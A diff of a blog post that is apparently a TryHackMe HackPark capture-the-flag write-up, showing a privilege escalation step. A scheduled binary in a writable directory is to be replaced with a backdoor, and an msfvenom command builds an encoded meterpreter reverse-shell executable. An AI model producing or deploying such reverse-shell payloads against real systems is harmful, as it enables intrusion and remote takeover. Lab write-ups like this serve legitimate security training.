KnuckleSecurity/website/_posts/2021-12-31-thm-hackpark-ctf-writeup.markdown

 ![](/assets/img/posts/tryhackme-hackpark-ctf-writeup/29.png)<br>
 The scheduler executes a binary called Messages.exe every 23 seconds.
 ![](/assets/img/posts/tryhackme-hackpark-ctf-writeup/30.png)<br>
-This binary is also in the modifiable directory.
+This binary in the modifiable directory too.
 If we create a backdoor and put it where Message.exe sits, we can escalate our privileges.
-<br><br>Once again, let's create a meterpreter reverse shell binary.
+<br><br>Once again, let us create a meterpreter reverse shell binary.
 {% highlight powershell %}
 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST={THM IP} LPORT={SOME FREE PORT} -f exe revshell.exe
 {% endhighlight %}